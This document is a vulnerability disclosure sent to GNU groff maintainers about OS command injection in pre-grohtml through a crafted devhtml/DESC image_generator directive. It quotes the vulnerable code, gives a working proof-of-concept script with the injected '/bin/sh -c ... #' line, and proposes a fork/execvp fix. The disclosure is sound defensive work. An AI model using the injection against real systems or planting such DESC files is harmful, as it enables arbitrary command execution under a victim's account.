Hello maintainers, we have discovered an injection bug in the new version of
groff.
# GNU groff 1.24.0: OS command injection (CWE-78) in pre-grohtml image_generator handling via crafted devhtml/DESC
## Summary
- **CWE**: CWE-78 (Improper Neutralization of Special Elements used in an
OS Command / OS Command Injection)
- **Vendor**: GNU Project
- **Product**: GNU groff (`pre-grohtml` / `groff -Thtml` pipeline)
- **Affected Version(s)**: GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e` (tested as GNU groff 1.24.0)
- **Affected Component(s)**:
  - `src/preproc/html/pre-html.cpp`, `get_image_generator()`: reads the
    `image_generator` directive from the `devhtml/DESC` device description
    selected through the groff font/device search path.
  - `src/preproc/html/pre-html.cpp`, `imageList::createPage()`: inserts
    the `image_generator` string directly into a shell command string.
  - `src/preproc/html/pre-html.cpp`, `html_system()`: executes the
    constructed command string with `system()`.
- **Attack Type / Vector**: Local — via a crafted groff font/device
directory supplied with `-F`, containing a malicious `devhtml/DESC`
`image_generator` directive, when `groff -Thtml` processes input that
triggers image generation.
- **Impact**: Arbitrary command execution with the privileges of the user
running `groff -Thtml`.
This report is independent from the companion GNU groff `eqn` CWE-121
report. They affect different groff components and different attack
surfaces: this issue is command injection in the HTML preprocessing
pipeline, while the companion report is a stack-based buffer overflow in
the `eqn` parser.
---
## Technical Details / Root Cause
In GNU groff, the HTML output pipeline uses `pre-grohtml` to prepare input
for HTML formatting and to generate images for content such as equations.
`pre-grohtml` reads device-description files from the groff font/device
search path. The normal `groff -F <font-directory>` option can select an
alternate font/device directory, including an alternate `devhtml/DESC` file.
The vulnerability is in the interaction between the `image_generator`
directive in `devhtml/DESC` and shell command construction in `pre-grohtml`:
1. **Attacker-controlled device directive is read from the selected font
path**: `get_image_generator()` opens `devhtml/DESC` through
`font_path.open_file()`, then returns the text after the `image_generator`
keyword without shell escaping, validation, or restriction:
```cpp
static char *get_image_generator(void)
{
  char *pathp;
  FILE *f;
  char *generator = 0 /* nullptr */;
  const char keyword[] = "image_generator";
  const size_t keyword_len = strlen(keyword);
  f = font_path.open_file(devhtml_desc, &pathp);
  if (0 /* nullptr */ == f)
    fatal("cannot open file '%1': %2", devhtml_desc, strerror(errno));
  int lineno = 0;
  while (get_line(f, pathp, lineno++)) {
    char *cursor = linebuf;
    size_t limit = strlen(linebuf);
    char *end = linebuf + limit;
    if (0 == (strncmp(linebuf, keyword, keyword_len))) {
      cursor += keyword_len;
      // At least one space or tab is required.
      if(!(' ' == *cursor) || ('\t' == *cursor))
        continue;
      cursor++;
      while((cursor < end) && ((' ' == *cursor) || ('\t' == *cursor)))
        cursor++;
      if (cursor == end)
        continue;
      generator = cursor;
    }
    ...
  }
  free(pathp);
  fclose(f);
  return generator;
}
```
2. **The directive is stored as the global image generator command**:
During startup, `main()` copies the returned string into `image_gen`:
```cpp
image_gen = strsave(get_image_generator());
if (0 /* nullptr */ == image_gen)
  fatal("'image_generator' directive not found in file '%1'",
        devhtml_desc);
```
At this point, a crafted `devhtml/DESC` can make `image_gen` contain
shell syntax such as `/bin/sh -c 'touch /tmp/marker' #`.
3. **The directive is concatenated into a shell command**: When HTML output
requires image generation, `imageList::createPage()` constructs a command
string and places `image_gen` at the beginning of the command:
```cpp
int imageList::createPage(int pageno)
{
  ...
  const char *s = make_string("ps2ps -sPageList=%d %s %s",
                              pageno, psFileName, psPageName);
  html_system(s, 1);
  assert(strlen(image_gen) > 0);
  s = make_string("echo showpage | "
                  "%s%s -q -dBATCH -dSAFER "
                  "-dDEVICEHEIGHTPOINTS=792 "
                  "-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
                  "-sDEVICE=%s -r%d %s "
                  "-sOutputFile=%s %s -",
                  image_gen,
                  EXE_EXT,
                  (getMaxX(pageno) * image_res) / postscriptRes,
                  image_device,
                  image_res,
                  antiAlias,
                  imagePageName,
                  psPageName);
  html_system(s, 1);
  free(const_cast<char *>(s));
  ...
}
```
4. **The constructed string is executed by the shell**: `html_system()`
passes the constructed command string to `system()`:
```cpp
static void html_system(const char *s, int redirect_stdout)
{
  ...
  int status = system(s);
  ...
}
```
`system()` invokes `/bin/sh -c`, so shell metacharacters and shell
syntax in `image_generator` are interpreted by the shell rather than passed
through as literal text. A trailing `#` in the malicious directive comments
out the rest of the command appended by `pre-grohtml`.
No neutralization occurs anywhere on this path. The `image_generator` value
is selected from an attacker-controlled device-description file,
concatenated into a shell command, and executed with `system()`.
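
To make the effect of the trailing `#` concrete, the sketch below reproduces the format string from `imageList::createPage()` in a standalone function and returns the resulting command line. It is an illustration only: `build_image_command()` is a hypothetical name, `snprintf` stands in for groff's `make_string()`, `EXE_EXT` is assumed to be empty (as on Linux), and the width, device, resolution, anti-alias flag, and file names are placeholder values rather than values from a real run.

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// Hypothetical stand-in for the command construction in
// imageList::createPage(). All values other than image_gen are
// placeholders chosen for illustration.
std::string build_image_command(const std::string &image_gen)
{
  const char *exe_ext = "";  // assumption: EXE_EXT is empty on this platform
  char buf[1024];
  int n = std::snprintf(buf, sizeof buf,
                        "echo showpage | "
                        "%s%s -q -dBATCH -dSAFER "
                        "-dDEVICEHEIGHTPOINTS=792 "
                        "-dDEVICEWIDTHPOINTS=%d -dFIXEDMEDIA=true "
                        "-sDEVICE=%s -r%d %s "
                        "-sOutputFile=%s %s -",
                        image_gen.c_str(), exe_ext,
                        612,                  // placeholder page width
                        "pnmraw",             // placeholder image device
                        100,                  // placeholder resolution
                        "-dTextAlphaBits=4",  // placeholder anti-alias flag
                        "page.pnm", "page.ps");
  // The placeholders are short, so the result must fit in the buffer.
  assert(n > 0 && static_cast<size_t>(n) < sizeof buf);
  return std::string(buf);
}
```

Passing the PoC-style value `/bin/sh -c 'touch /tmp/marker' #` yields a string that begins `echo showpage | /bin/sh -c 'touch /tmp/marker' # -q -dBATCH ...`. Everything after the `#` is a shell comment, so only the injected command runs.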
---
## Reproduction (PoC)
The command injection is reproducible on the default upstream build of GNU
groff on Linux. The PoC below creates a valid alternate font/device
directory by copying the stock `devhtml` and `devps` device descriptions,
then changes only the `image_generator` directive.
```sh
cd ~/groff_master
rm -rf /tmp/groff_font_cwe78 /tmp/groff_prehtml_cwe78_master
mkdir -p /tmp/groff_font_cwe78/devhtml /tmp/groff_font_cwe78/devps
# Preserve valid device descriptions and modify only image_generator.
cp font/devhtml/DESC /tmp/groff_font_cwe78/devhtml/DESC
cp font/devps/DESC /tmp/groff_font_cwe78/devps/DESC
python3 - <<'PY'
p = '/tmp/groff_font_cwe78/devhtml/DESC'
with open(p) as f:
    lines = f.read().splitlines()
out = []
for line in lines:
    # Swap in the marker-file command; keep every other directive unchanged.
    if line.startswith('image_generator'):
        out.append("image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #")
    else:
        out.append(line)
with open(p, 'w') as f:
    f.write('\n'.join(out) + '\n')
PY
# Use an equation to trigger HTML image generation.
cat > /tmp/eqn_image_cwe78.roff <<'R'
.EQ
a over b
.EN
R
./test-groff -F /tmp/groff_font_cwe78 -e -Thtml /tmp/eqn_image_cwe78.roff \
>/tmp/groff_html_master.out 2>/tmp/groff_html_master.err
echo "exit=$?"
ls -l /tmp/groff_prehtml_cwe78_master
sed -n '1,8p' /tmp/groff_html_master.err
```
The PoC uses two small files/directories. The relevant modified line in
`/tmp/groff_font_cwe78/devhtml/DESC` is:
```text
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
```
The input document `/tmp/eqn_image_cwe78.roff` is intentionally minimal;
its only purpose is to trigger HTML image generation:
```roff
.EQ
a over b
.EN
```
Observed result on Ubuntu 24.04 (`gcc 13.3.0`, default `./bootstrap &&
./configure && make`), using GNU groff Git master commit
`967814d0057ba2bd7802c81dae2bc0e7a4f2616e`:
```text
GNU groff version 1.24.0
image_generator /bin/sh -c 'touch /tmp/groff_prehtml_cwe78_master' #
master exit=0
MASTER_MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:22 /tmp/groff_prehtml_cwe78_master
pamcut: Error reading first byte of what is expected to be a Netpbm magic
number. Most often, this means your input file is empty
pnmcrop: Error reading first byte of what is expected to be a Netpbm magic
number. Most often, this means your input file is empty
pnmtopng: Error reading first byte of what is expected to be a Netpbm magic
number. Most often, this means your input file is empty
pre-grohtml: command 'pamcut 115 3 9 29 < /tmp/groff-page-0AmDwB | pnmcrop
-quiet| pnmtopng -quiet -background rgb:f/f/f -transparent rgb:f/f/f>
grohtml-2210740-2.png' returned status 1
```
The marker file `/tmp/groff_prehtml_cwe78_master` is created by the command
embedded in `devhtml/DESC`. This confirms that the stock compiled binary
executes the injected command. The later `pamcut`/`pnmcrop` diagnostics occur
only because the PoC replaces the expected Ghostscript program with a
marker-file command; they are not required for command execution.
A final verification run after report formatting used a fresh marker file
and reproduced the same injection:
```text
groff -F malicious -e -Thtml exit=0
MARKER_CREATED
-rw-rw-r-- 1 zijian zijian 0 Jun 10 00:29 /tmp/reverify_cwe78_marker
```
---
## Fix / Mitigation
Avoid executing a shell command constructed from a device-description
string. The `image_generator` directive should be treated as an executable
path or command name, not as shell syntax.
**Recommended fix**: Replace the `system()` call with a direct `fork()` +
`execvp()` style invocation of the image generator using an `argv` array.
This ensures that the image-generator path and its arguments are passed as
separate arguments and cannot be interpreted as shell commands.
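
A minimal sketch of such a shell-free invocation on a POSIX system follows. `run_without_shell()` is a hypothetical helper, not an existing groff function. It also leaves out two things `pre-grohtml` would still need: feeding `showpage` to the child's standard input and the stdout redirection that `html_system()` performs.

```cpp
#include <cassert>
#include <cerrno>
#include <string>
#include <vector>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Hypothetical helper (not part of groff): run a program directly,
// without /bin/sh. Returns the child's exit status, or -1 if the child
// could not be created or did not exit normally.
int run_without_shell(const std::vector<std::string> &args)
{
  assert(!args.empty());
  // Build a null-terminated argv; each element is passed verbatim.
  std::vector<char *> argv;
  for (const std::string &a : args)
    argv.push_back(const_cast<char *>(a.c_str()));
  argv.push_back(nullptr);

  pid_t pid = fork();
  if (pid < 0)
    return -1;
  if (pid == 0) {
    execvp(argv[0], argv.data());
    _exit(127);  // only reached if execvp() failed
  }
  int status = 0;
  while (waitpid(pid, &status, 0) < 0) {
    if (errno != EINTR)
      return -1;
  }
  return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this approach, a whole directive such as `/bin/sh -c 'touch /tmp/marker' #` passed as a single element is treated as one program name. No such file exists, so `execvp()` fails and the child exits with status 127 without running the embedded command.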
If configurable arguments are required, parse them with a shell-free
tokenizer and pass each token as a separate `argv` element. Do not pass the
resulting string through `/bin/sh -c`.
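
One possible shape for such a tokenizer is sketched below. `split_words()` is a hypothetical name, and splitting on whitespace only is an assumption about what the directive would need to support. Quotes, `#`, `;`, `|`, and `$` get no special treatment, and each word would become one `argv` element.

```cpp
#include <cassert>
#include <sstream>
#include <string>
#include <vector>

// Hypothetical shell-free tokenizer: splits on whitespace only.
// No quoting, globbing, comments, or variable expansion is recognized.
std::vector<std::string> split_words(const std::string &directive)
{
  // Mirrors pre-grohtml's own requirement that image_gen is non-empty.
  assert(!directive.empty());
  std::vector<std::string> words;
  std::istringstream in(directive);
  std::string word;
  while (in >> word)
    words.push_back(word);
  return words;
}
```

Applied to the PoC directive, this produces the five literal words `/bin/sh`, `-c`, `'touch`, `/tmp/marker'`, and `#`. The quote characters and the `#` stay inside the words as ordinary text, and nothing is dropped as a comment. Shell-free invocation removes shell interpretation only: a `DESC` file can still name an arbitrary program, so the trust restrictions on font/device directories remain relevant.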
### Recommended Mitigations
- **Preferred**: Replace `system()` in the image-generation path with a
shell-free process invocation (`fork()` + `execvp()` or equivalent).
- If patching is not immediately possible:
  - Do not run `groff -Thtml` with untrusted `-F` font/device directories.
  - Do not allow untrusted users to supply `devhtml/DESC` files.
  - Pin groff's font/device path to a trusted directory and sandbox the
    formatter when processing untrusted input.
Thank you.